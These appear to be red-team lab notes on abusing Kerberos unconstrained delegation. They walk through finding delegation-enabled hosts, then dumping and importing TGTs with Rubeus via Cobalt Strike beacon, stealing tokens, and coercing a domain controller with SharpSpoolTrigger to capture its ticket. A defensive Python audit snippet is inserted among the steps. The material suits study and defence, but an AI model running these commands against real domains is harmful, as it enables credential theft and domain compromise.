Unconstrained Delegation

Introduction

Delegation allows a user or computer to impersonate another account in order to access resources (such as backend database servers). Practical examples can be found here.

A system trusted for unconstrained delegation caches the TGT of any user who authenticates to it. So if we compromise a machine with unconstrained delegation, we can extract any TGT from its memory and use it to impersonate that user.

Technique: If we compromise a computer with unconstrained delegation, we can social engineer a user to interact with it and steal their TGT. We can also just wait for users and harvest TGTs. Interaction can be as simple as dir \\web\c$

Note: Domain Controllers are always permitted for unconstrained delegation.

Enumerate computers with unconstrained delegation

The filter matches computer objects whose userAccountControl has the bit 524288 (0x80000, TRUSTED_FOR_DELEGATION) set; 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule.

beacon> execute-assembly C:\Tools\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
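As an added Python example (not from the original notes), the same check the LDAP filter performs, emulating the bit-AND matching rule over constructed computer records. The point for a defender is to separate Domain Controllers, where the flag is expected, from member servers, where it is a finding. Flag values are the documented userAccountControl constants; hosts other than dc-2 and web are constructed.

```python
# Added example: audit userAccountControl for unconstrained delegation.
# Constants are the standard userAccountControl flag values.
TRUSTED_FOR_DELEGATION = 0x80000            # 524288: unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
SERVER_TRUST_ACCOUNT = 0x2000               # 8192: domain controller computer account
WORKSTATION_TRUST_ACCOUNT = 0x1000          # 4096: member server or workstation


def matches_bit_and(uac: int, mask: int) -> bool:
    """Emulates LDAP matching rule 1.2.840.113556.1.4.803 (LDAP_MATCHING_RULE_BIT_AND):
    true when every bit in mask is set in uac."""
    return (uac & mask) == mask


def classify(record: dict) -> str:
    """Return the delegation posture of one computer object."""
    uac = record["userAccountControl"]
    if matches_bit_and(uac, TRUSTED_FOR_DELEGATION):
        if matches_bit_and(uac, SERVER_TRUST_ACCOUNT):
            return "dc-expected"          # DCs always carry this flag
        return "unconstrained"            # the audit finding
    if matches_bit_and(uac, TRUSTED_TO_AUTH_FOR_DELEGATION):
        return "constrained-protocol-transition"
    if record.get("msDS-AllowedToDelegateTo"):
        return "constrained"
    return "none"


def find_unconstrained(records: list) -> list:
    """samAccountNames of non-DC computers trusted for unconstrained delegation."""
    return sorted(r["samAccountName"] for r in records if classify(r) == "unconstrained")


# Constructed sample records standing in for the LDAP search result.
SAMPLE_COMPUTERS = [
    # 0x82000 = SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION, the default for a DC
    {"samAccountName": "DC-2$", "dnsHostName": "dc-2.rotta.lab", "userAccountControl": 0x82000},
    # 0x81000 = WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION: a member server
    {"samAccountName": "WEB$", "dnsHostName": "web.rotta.lab", "userAccountControl": 0x81000},
    # constrained delegation (hypothetical host): SPN list set, delegation bit clear
    {"samAccountName": "SQL-2$", "dnsHostName": "sql-2.rotta.lab", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["cifs/fs-1.rotta.lab"]},
    {"samAccountName": "WKSTN-1$", "dnsHostName": "wkstn-1.rotta.lab", "userAccountControl": 0x1000},
]

if __name__ == "__main__":
    for r in SAMPLE_COMPUTERS:
        print(f'{r["samAccountName"]:10} {classify(r)}')
    print("findings:", find_unconstrained(SAMPLE_COMPUTERS))
```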

Rubeus triage & monitor

Rubeus triage shows all tickets currently cached on the host, together with the LUID of the logon session each belongs to. The faster way is just to use monitor.

beacon> execute-assembly C:\Tools\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus.exe monitor /interval:10 /nowrap

Rubeus Dump TGT

Using the LUID from triage we can dump the TGT, then use createnetonly to start a sacrificial process and import the ticket into it.

beacon> execute-assembly C:\Tools\Rubeus.exe dump /luid:<luid-from-triage> /nowrap

beacon> execute-assembly C:\Tools\Rubeus\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:cfoxy /password:Password123! /ticket:<base64-tgt>

[*] Showing process : False
[*] Username        : cfoxy
[*] Domain          : DEV
[*] Password        : Password123!
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 1540
[+] Ticket successfully imported!
[+] LUID            : 0x3206fb

Steal Token

We can then steal the token of the new process with Cobalt Strike's steal_token.

beacon> steal_token 1540

beacon> ls \\dc-2.rotta.lab\c$

Harvest TGT by forcing authentication

We can obtain TGTs for computer accounts by forcing them to authenticate remotely to the unconstrained machine.

Rubeus monitor

Rubeus' monitor command drops into a loop and continuously watches for and extracts new TGTs as they get cached. It's a superior strategy compared to running triage manually because there's little chance of missing a ticket.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap

[*] Action: TGT Monitoring
[*] Monitoring every 10 seconds for new TGTs

SharpSpoolTrigger

Next, run SharpSpoolTrigger.

beacon> execute-assembly C:\Tools\SharpSpoolTrigger.exe dc-2.rotta.lab web.rotta.lab

Where:

  • DC-2 is the "target".

  • WEB is the "listener".

Rubeus will then capture the ticket.

[*] 9/6/2022 2:44:52 PM UTC - Found new TGT:

  User                  :  dc-2$.rotta.lab
  StartTime             :  9/6/2022 9:06:14 AM
  EndTime               :  9/6/2022 7:06:14 PM
  RenewTill             :  9/13/2022 9:06:14 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

doIFuj[...]lDLklP

To stop Rubeus, use the jobs and jobkill commands.
